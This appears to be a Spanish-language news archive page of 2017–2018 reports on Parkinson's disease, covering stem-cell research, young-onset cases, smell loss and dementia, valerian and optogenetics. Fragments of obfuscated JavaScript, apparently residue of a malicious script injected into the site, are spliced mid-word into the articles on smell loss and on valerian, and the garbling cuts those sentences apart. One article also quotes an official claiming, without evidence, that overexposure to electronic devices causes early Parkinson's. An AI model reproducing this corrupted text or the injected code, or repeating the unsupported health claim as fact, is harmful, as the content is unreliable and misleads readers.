Etiquetas: Parkinson


Crean protocolo mexicano para el tratamiento de Parkinson

28 julio, 2018

Monterrey. Investigadores del Instituto Tecnológico y de Estudios Superiores de Monterrey (ITESM) crearon el primer protocolo mexicano para el tratamiento de enfermedades neurodegenerativas como el Parkinson y la Esclerosis Lateral Amiotrófica (ELA).

La institución privada señalo que ambas enfermedades, neurodegenerativas e incurables, ahora serán tratadas con un nuevo protocolo de investigación desarrollado por científicos del Centro de Parkinson, Movimientos Anormales y Neurorestauración del Hospital Zambrano Hellion TecSalud.

Resaltó, en un comunicado, que dicho protocolo ya ha sido aprobado por instancias estatales y federales.

Los doctores Héctor Ramón Martínez Rodríguez y Jorge Moreno Cuevas, investigadores de la Escuela de Medicina y Ciencias de la Salud, son los desarrolladores de esta iniciativa.

Estos avances científicos más recientes de la estrategia terapéutica celular con la que han atacado estos padecimientos tienen el objetivo de incrementar la esperanza y calidad de vida de los pacientes que sufren estos trastornos, enfatizaron.

Martínez Rodríguez refirió que la enfermedad de Parkinson afecta actualmente a más de cuatro millones de personas en todo el mundo, pero se estima que para el 2030 esta cifra se duplique.

Esta enfermedad, detalló, es producida principalmente por la pérdida de neuronas dopaminérgicas en el cerebro, lo cual provoca pérdida del control de los movimientos voluntarios, produciendo temblores y rigidez.

Ante ello, indicó, desde hace una década han hecho investigaciones -ya publicadas en revistas científicas- en las que proponen atacar la enfermedad mediante el trasplante de células madre.

Manifestó que de ahí parte el protocolo de investigación, de regular la biología de las células madre para producir otras células con capacidad de conversión, para que al ser trasplantadas en el cerebro se mimeticen en el microambiente de las células sanas.

Todo a través de trasplantes autólogos, es decir, de la sangre del mismo paciente, agregó.

Destacó que tras la producción de estas neuronas en cultivo de tejidos pasaron a un modelo experimental en animales de laboratorio, en los que los resultados hasta ahora han sido positivos en un 80 por ciento.

“Ya tenemos el cultivo y el reporte experimental, el siguiente paso es transferir estos conocimientos obtenidos a la parte clínica, estamos preparando la logística de cómo será el abordaje de estos pacientes”, dijo.

Expresó que “consideramos iniciar a partir de septiembre cuando nos hayan aprobado los requisitos para el funcionamiento del laboratorio de alta tecnología único en nuestro país para terapia celular en humanos (Laboratorio GMP) que cumple con los requisitos para buenas prácticas clínicas de trasplantes celulares en diferentes enfermedades”

El especialista indicó que con la autorización y el funcionamiento del Laboratorio GMP, realizarán un estudio piloto para pasar a la fase 2 del protocolo, la de seguridad, que consiste en monitorear las reacciones de los pacientes tras el procedimiento, y posteriormente a la fase 3, que es el estudio aleatorio doble ciego de pacientes y controles.

Sin embargo, advirtió que, aunque la neurona dopaminérgica es la fundamental para el Parkinson, han descubierto otras neuronas que también se enferman.

Es por esa razón que además de los evidentes síntomas motores – temblores, rigidez, lentitud – existen otros síntomas no motores, como seborrea, visión borrosa, insomnio, estreñimiento, hipotensión, trastorno del sueño, entre otros, expuso.

Por su parte, Moreno Cuevas informó que este mismo protocolo de trasplante autólogo de células madre es aplicado también para el tratamiento de otras dos enfermedades neurodegenerativas: la ELA (esclerosis lateral amiotrófica) y la lesión traumática de médula espinal, que actualmente tienen reducidas posibilidades de cura.

Las ventajas del trasplante autólogo, señalan los investigadores, es que no necesita ser apoyado por quimioterapia, ya que está comprobado que célula madre autóloga no se transforma en tumor, aseguró.

Manifestó que “en esta investigación con células madre autólogas, lo peor que puede pasar es que no pase nada”.

Con este protocolo, acoto, se buscará atacar la ELA, pero en este caso se enfrentan al dilema de cómo trasplantar las células madre, si transformada a preneurona o de célula madre no diferenciada.

“Nuestro gran proyecto ahorita es seguir con el protocolo de investigación en pacientes con ELA, ir modificando cómo llegar a detenerla y mejorar la calidad de vida, cosa que ya hemos hecho: pues los que fallecían de ELA a los 29.6 meses después del diagnóstico, ahora tienen 52 meses de supervivencia “, señaló.

Expresó que “sigue siendo una enfermedad mortífera, pero hemos retardado el proceso y hay una prolongación tanto en cantidad como en calidad de vida”.

Asimismo, en el Parkinson hace una década la esperanza de vida era de 10 o 12 años, y actualmente es al menos de 20 a 25 años.

Todo este proceso ha sido aprobado por el Comité Institucional de Investigación y de Ética del Tecnológico de Monterrey, por la Comisión Federal para la Protección contra Riesgos Sanitarios (Cofepris), y por la Secretaría de Salud de Nuevo León.

Incluso también ha sido auditado y acreditado por el consorcio NEALS (North East Amyothrophic Lateral Sclerosis), integrado por las universidades top del noreste de Estados Unidos, como el MIT, Harvard, John Hopkins y Duke University, entre otras.


Sobreexposición a aparatos electrónicos provocaría desarrollo de Parkinson en adultos jóvenes

17 abril, 2018

Yhadira Paredes. Xalapa. La sobreexposición a aparatos y dispositivos electrónicos puede ser un factor importante en el desarrollo del Parkinson en adultos jóvenes de entre 35 a los 50 años, aseveró la delegada estatal del Instituto Nacional de las Personas de Adultos Mayores (Inapam), Nayeli Yoltzin Vera Brizuela.

En entrevista, recordó que el pasado 11 de abril se conmemoró el Día Mundial del Parkinson y destacó que en Veracruz hay en tratamiento entre mil 500 y 2 mil 500 pacientes.

El Parkinson, explicó, es una patología incierta, es un trastorno del movimiento ocasionado por degeneración de neuronas que produce dopamina, en Veracruz está ubicado dentro de las entidades con un índice promedio a nivel mundial en cuanto a la detección de la enfermedad.

“Se estima que actualmente hay 164 casos por cada 100 mil habitantes mayores de 60 años que es donde se da esta patología; sin embargo, en los últimos años se han ido detectando casos en edades tempranas, esto es de 30 a 50 años, que son donde están dando de manera agresiva la enfermedad, pero es mucho menor la incidencia, es un caso por cada 100 mil habitantes en adultos jóvenes”.

Sobre la presencia del padecimiento en adultos jóvenes, la encargada del Inapam señaló que se ha detectado que tiene factores genéticos, ambientales, “y ahora se piensa que se está dando en adultos jóvenes por la sobreexposición a aparatos electrónicos y estrés que estos causan”.

En ese sentido, hizo un llamado a los padres de familia a cuidar a los menores de edad para que tengan controlado el uso de celulares o tabletas y también como adultos dar un tiempo especifico y evitar la sobreexposición.

Nayeli Vera insistió en que no hay n tratamiento curativo, solo paliativo, no hay uno en especifico que controle al 100 por ciento las manifestaciones como son temblores, rigidez de músculos, dificultad para generar caminar, perdida de reflejos, que afectan el 100 por ciento de la anatomía del paciente.

Finalmente, si bien consideró que el tratamiento se puede dar una mejor calidad de vida, se genera depresión alteraciones de sueño, psicológicas por las manifestaciones que se ha tenido.

“Hay que hacer hincapié en los controles y detecciones oportunas, acudir una vez al año, lo que no dará de manera prematura un diagnóstico, aunque en el caso del Parkinson son tangibles las manifestaciones, el 85 por ciento de los pacientes el temblor de las extremidades”.


Presencia de Parkinson afecta a 10% de personas menores de 40 años

16 abril, 2018

Monterrey. La presencia de la enfermedad de Parkinson ya no sólo afecta a las personas de la tercera edad, ya que al menos, 10 por ciento de las personas con este padecimiento son menores de 40 años.

Así lo señaló la Jefa del Servicio de Neurología del Hospital Universitario “José Eleuterio González”, Beatriz Eugenia Chávez Luévanos, al resaltar que ante estas estadísticas, se llevarán a cabo jornadas informativas que permitan diagnosticar y otorgar tratamientos oportunos a este padecimiento neurológico.

Refirió que en la actualidad, la enfermedad de Parkinson ya no sólo afecta a personas de la tercera edad, sino que cada vez empieza a aparecer en adultos jóvenes de entre 35 y 40 años de edad.

“En los últimos años, en México ha empezado a presentarse en las personas jóvenes y en la etapa productiva de su vida. Se estima que por cada 10 personas que padecen Parkinson, uno es menor de 40 años de edad”, advirtió.

Chávez Luévanos dijo que de acuerdo con datos del Hospital Universitario, de la Universidad Autónoma de Nuevo León (UANL), el Parkinson es la segunda enfermedad neurodegenerativa y en México, se estima que afecta a 50 de cada 100 mil habitantes.

A nivel mundial hay alrededor de 10 millones con este problema neurológico y el 30 por ciento desconoce que la padece. Su incidencia es mayor en los adultos mayores y es más frecuente en hombres.

“En México, nos tardamos tres años para que el paciente llegue al diagnóstico, por eso la importancia del mismo para llevar un tratamiento adecuado”, detalló a su vez la profesora del Servicio de Neurología del HU, Ingrid Eloísa Estrada Bellman.

Entre los síntomas más frecuentes de esta enfermedad están la rigidez, lentitud en los movimientos, cambios en la postura, trastornos de la marcha, disminución del braceo, disminución del tono de la voz, tartamudeo y cambios faciales ocasionados por la rigidez.

Fuente: Notimex


El Parkinson no es exclusivo de adultos mayores; también afecta a jóvenes

10 abril, 2018

México. El enfermedad neurodegenerativa Parkinson no es exclusiva de adultos mayores, y en la población de jóvenes se presenta con un factor genético importante como causa, afirmó el neurólogo Daniel Martínez Ramírez.

El profesor clínico en neurología recordó que este padecimiento progresa en forma lenta y se puede presentar en personas de 20 hasta 40 años. Se caracteriza por el daño a varios circuitos o sistemas dentro del cerebro, y no todos los pacientes presentan síntomas de temblor en sus movimientos.

En entrevista con Notimex en el marco del Día Mundial del Parkinson, a celebrarse mañana 11 de abril, el neurólogo agregó que este padecimiento afecta de igual forma a adultos como a jóvenes. “Se puede presentar en cualquier edad, y lo que hemos registrado es que afecta más a hombres que a mujeres, en una relación de dos a uno; la causa no está bien definida”, señaló el especialista.

Destacó que el principal síntoma de esta enfermedad que afecta a las células nerviosas en el cerebro encargadas de controlar movimientos, es la lentitud de las personas al ejecutar cualquier acción.

“En el caso particular de las células cerebrales que producen dopamina que se van perdiendo con la presencia del Parkinson, la disminución de generación de dopamina producirá síntomas motores como rigidez y lentitud del movimiento”, apuntó.

El especialista comentó que temblor en reposo, rigidez de las extremidades, son otras de las sintomatologías propias de la enfermedad. Agregó que existe un cuarto indicio producido de manera general en etapa avanzada y es el desequilibrio o inestabilidad postural, “Tres de cada 10 pacientes, no presenta síntomas de movimientos (que su cuerpo tiemble)”, dijo.

Sin embargo, el médico reconoció que esta enfermedad también afecta otras células cerebrales que producen síntomas no motores, por lo cual los pacientes pueden presentar trastornos del sueño, estado de ánimo, ansiedad, depresión, de memoria, fatiga y estreñimiento.

Algunos síntomas tempranos o signos de alarma para las personas con Parkinson, son el estreñimiento, problemas del sueño (tirar golpes dormido), pérdida del olfato, cambios en la escritura y encorvamiento de la postura

Otros signos de alerta son dolor de hombros y cambios en las expresiones faciales, así como la disminución en el tono de la voz, abundó el experto.

Daniel Martínez explicó existen diferentes razones para el desarrollo del Parkinson, aunque destacó la importancia de acudir al médico para determinar el origen del malestar. “El punto es que si hay un conjunto de síntomas, lo recomendable es acudir al médico para que haga una valoración completa, dijo.

A pesar de que la calidad de vida se deteriora de los jóvenes con este padecimiento, el médico aseguró que con un manejo adecuado de la enfermedad es posible tener calidad de vida.

“La esperanza de vida es muy similar entre una persona con o sin la enfermedad”, expuso.

Fuente: Notimex


Parkinson afecta a más de 6 millones de personas en el mundo

2 abril, 2018

México. Cerca de 6.2 millones de personas en el mundo sufren de la enfermedad del Parkinson, que hoy es la segunda enfermedad neurodegenerativa más frecuente en el mundo después del Alzheimer.

Así lo destacó el neurólogo con alta especialidad en enfermedad de Parkinson y Trastornos del Movimiento, Rodrigo Lloréns Arenas, con motivo del Día Mundial de Enfermedad de Parkinson, que se celebrará el 11 de abril.

En conferencia de prensa, el doctor destacó que se estima que para el año 2040 el número de pacientes con Parkinson se duplicará.

Sin embargo, a pesar de la importancia que representa esta enfermedad, en México no existe una cultura y conciencia para atender la enfermedad de Parkinson y por ello ni siquiera existe un dato preciso sobre las personas que padecen de este problema.

A grandes rasgos, apenas se tiene una referencia de que en el país existen unas 250 mil personas con este padecimiento, debido a que existe una brecha terapéutica de 30 por ciento, es decir, que se trata de personas que son mal diagnosticadas.

A pesar de ello, actualmente es la cuarta causa de consulta en el instituto Nacional de Neurología y Neurociencia “Manuel Velasco Suárez”.

Al respecto, el doctor Daniel Martínez explicó que uno de los problemas por el que el Parkinson no se detecta a tiempo es que se trata de la enfermedad que más síntomas previos presenta y muchos de ellos no son motores.

Una de las ideas del Parkinson es que genera temblor y rigidez de movimientos; sin embargo, existen síntomas no motores que por lo mismo suelen ser confundidos o atribuidos a otras circunstancias.

Entre estos síntomas no motores están el insomnio o los trastornos del sueño, en donde el paciente se mueve violentamente mientras duerme, cambios del estado de ánimo, depresión, somnolencia, estreñimiento y dolor de hombro.

Dichos síntomas tempranos podrían presentarse hasta 25 años antes del primer síntoma motor, por lo que un adecuado diagnóstico facilitaría a los médicos iniciar un tratamiento que garantice una mejor calidad de vida al paciente.

En ese sentido, el doctor Lloréns Arenas reveló que en 89 por ciento de los casos, los síntomas se presentan después de los 40 años; sin embargo, existe un 10.3 por ciento de casos en jóvenes de 21 a 39 años y de 0.7 por ciento en menores de 20 años

Aclaró que no se conocen con certeza las causas que generan esta enfermedad debido a que se desconocen todavía muchos eslabones de la cadena genética del hombre, pero si algo es seguro es que se trata de una enfermedad multifactorial.

Por lo mismo, para su atención adecuada es indispensable contar con la participación de un grupo multidisciplinario que atienda desde los problemas no motores hasta los clásicos que caracterizan al Parkinson, como la rigidez y el temblor.

Fuente: Notimex


Pérdida del olfato puede ser síntoma de demencia

8 octubre, 2017

México. Un déficit del sentido del olfato es a menudo un signo temprano de Parkinson o Alzheimer, que se agrava mientras la enfermedad va progresandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o, revela un estudio de la Universidad de Chicago.

En el estudio realizado a tres mil personas de entre 57 a 85 años de edad se descubrió que aquellos adultos que no pudieron identificar cuatro de cinco olores comunes, tenían el doble de probabilidades a desarrollar demencia en un periodo de cinco años.

Los resultaron indicaron que el 78 por ciento de ellos resultaron con un olfato normal, 14 pudo nombrar tres olores, cinco solo dos, el dos por ciento solo uno, mientras el uno por ciento no identificó ningún olor.

Después de cinco años, se encontró una conexión entre la pérdida de grado de olor y la incidencia de demencia.

Jayan M. Pinto, profesor de la Universidad de Chicago e investigador a cargo, señaló que estos análisis muestran que el sentido de olfato se encuentra altamente conectado con la salud y función del cerebro.

Dijo que las células que detectan los olores están directamente conectadas con el bulbo olfatorio en la base del cerebro, exponiendo potencialmente al sistema nervioso a peligros como la contaminación o patógenos (bacterias malignas).

Martha K. McClintock, co-investigadora de dicha institución, mencionó que el sistema olfativo contiene células madre auto-regenerativas, y al haber una disminución en el olfato puede significar una baja en la capacidad del cerebro para reconstruir componentes clave que constantemente disminuyen con la edad.

Pinto remarco que el estudio solo es el principio para poder determinar la conexión del olfato con la salud y nutrición del cerebral, sin embargo, es un avance para entender este vínculo.

Fuente: Notimex


Desarrolla estudiante mexicano tratamiento preventivo del Parkinson con planta

11 septiembre, 2017

Querétaro. Alfredo Rodríguez Cruz, estudiante del Doctorado en Ciencias Químico-Biológicas de la Facultad de Química de la Universidad Autónoma de Querétaro (UAQ), desarrolla un tratamiento preventivo contra el Mal de Parkinson por medio de la planta medicinal Valeriana.

A través del proyecto “Efecto de la Valeriana officinalis y el ácido valerénico en la neuroinflamación y neurodegeneración en un modelo de la enfermedad de Parkinson, inducido en ratón”, el alumno busca aportar al tratamiento del Mal de Parkinson.

El joven investigador comentó que dicho trabajo tiene como finalidad determinar el efecto que podría tener el ácido valerénico –contenido en la Valeriana– en la prevención de enfermedades neurodegenerativas, como la Enfermedad de Parkinson y, con ello, conocer si se puede retrasar la aparición de los síntomas o evitar que aparezca este padecimiento en adultos mayores.

“La Valeriana ha sido utilizada en la medicina tradicional por sus propiedades terapéuticas, principalmente para combatir trastornos relacionados con el sistema nervioso. Además, se le atribuyen otras propiedades curativas como auxiliar en depresión y ansiedad como ansiolítica, antiespasmódica, y antiinflamatoria, al tiempo que combate el estrés y evita el insomnio, entre otras propiedades”, expuso.

Rodríguez Cruz señaló que esta planta también ofrece efectos de protección neuronal al funcionar como antioxidante y como modulador del sistema inmune, protegiendo así del efecto neuroinflamatorio y neurodegenerativo del cerebro de los seres humanos.

“Esta investigación va encaminada a proteger las neuronas, en este caso proponemos la forma antioxidante y como inmunomodulador, ya que la parte del sistema inmune en la cuestión cerebral funge una función muy importante”, dijo.

De igual forma, añadió, “estamos buscandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o que este compuesto tenga un efecto benéfico y determinar cómo se lleva a cabo”.

“Posteriormente, ya que se tengan todas esas bases, poder proponer, ya sea la molécula como tal para desarrollar un fármaco, como un compuesto estandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}arizado o simplemente probar con una infusión o un té, de tal forma que también ayude a la sociedad en la cuestión económica”, resaltó el universitario.

La enfermedad del Parkinson es una neurodegeneración que consiste en la degradación de las neuronas dopaminérgicas, células nerviosas del cerebro que producen la dopamina, sustancia que es responsable de ayudar a los movimientos del cuerpo y de regular el estado de ánimo de una persona, por lo que la falta de ella provoca un proceso de movimientos involuntarios exacerbados.

Fuente: Notimex


Alzheimer, cáncer y Parkinson podrían tratarse con luz

24 agosto, 2017

México. La luz podría convertirse en la medicina del futuro debido a que sus aplicaciones biomédicas contra enfermedades neurológicas y celulares son amplias, por lo que resulta factible aplicarla en la rehabilitación de oído, vista, corazón, piel y riñón, aseveró el doctor Víctor Hugo Hernández González.

Además de que tiene aplicaciones en el tratamiento de cáncer, mal de Parkinson, Alzheimer, parálisis, ansiedad, insomnio y epilepsia, entre otras enfermedades.

La optogenética es la técnica que “despierta” o “apaga” grupos de neuronas del cerebro y combina la genética, la óptica y la virología, a fin de estudiar y tratar padecimientos, mereciendo el título de Técnica de año en 2010 por la revista Nature, especificó.

El especialista explicó que el procedimiento consiste en inyectar en las neuronas seleccionadas un virus benigno que contiene proteínas fotorreceptoras denominadas opsinas, cuya información genética proviene de algas fotosensibles, con lo que las células neutrales se vuelven sensibles a la luz.

En el Segundo Simposio de la División de Ciencias Naturales e Ingeniería, celebrado en la Unidad Cuajimalpa de la Universidad Autónoma Metropolitana (UAM), explicó que las proteínas actúan como interruptores que las excitan o inhiben, encienden o apagan las neuronas en función de los destellos de luz enviados mediante nanocables de fibra óptica para lograr un comportamiento deseado.

En la conferencia “El uso de la luz para estudiar al cerebro: la optogenética”, el director del Departamento de Ingenierías, Química, Electrónica y Bioquímica de la División de Ciencias e Ingenierías de la Universidad de Guanajuato expuso que la experimentación se lleva a cabo sólo en animales y las limitaciones para el estudio en humanos son de índole tecnológica y bioética.

Para su aplicación se requiere de la tecnología led o de fibra óptica de un tamaño nanométrico y flexible con capacidad de canales luminosos mucho más amplios y que permitan llevar luz en forma eficiente al sitio focalizado del cuerpo para que ésta reactive la función perdida.

Hernández González experimenta en la aplicación de la optogenética en el sentido del oído, en la aplicación de la luz dirigida a individuos con sordera, padecimiento frecuente debido al ruido excesivo en las ciudades y el volumen alto de audífonos.

El método tradicional para recuperar la capacidad auditiva de las personas con resultados aceptables para desarrollar una vida normal son los implantes cocleares que estimulan el oído por medio de electricidad, pero con un nivel de audición limitado.

Los pacientes no disfrutan de la música, no distinguen tonos, no perciben la prosodia, el sentido de las palabras o de las entonaciones, por lo que no pueden aprender idiomas, además de que no escuchan en ambientes con demasiado ruido.

Por tanto, indicó, el empleo de la luz posibilitaría trabajar en forma específica con estímulos enfocados, introduciendo una proteína sensible a la luz en el nervio auditivo, cuyo destello sería captado por el cerebro como si fuera un sonido, como sucede la respuesta al sonido de manera natural, por lo tanto se tendría una recuperación auditiva más eficiente.

Fuente: Notimex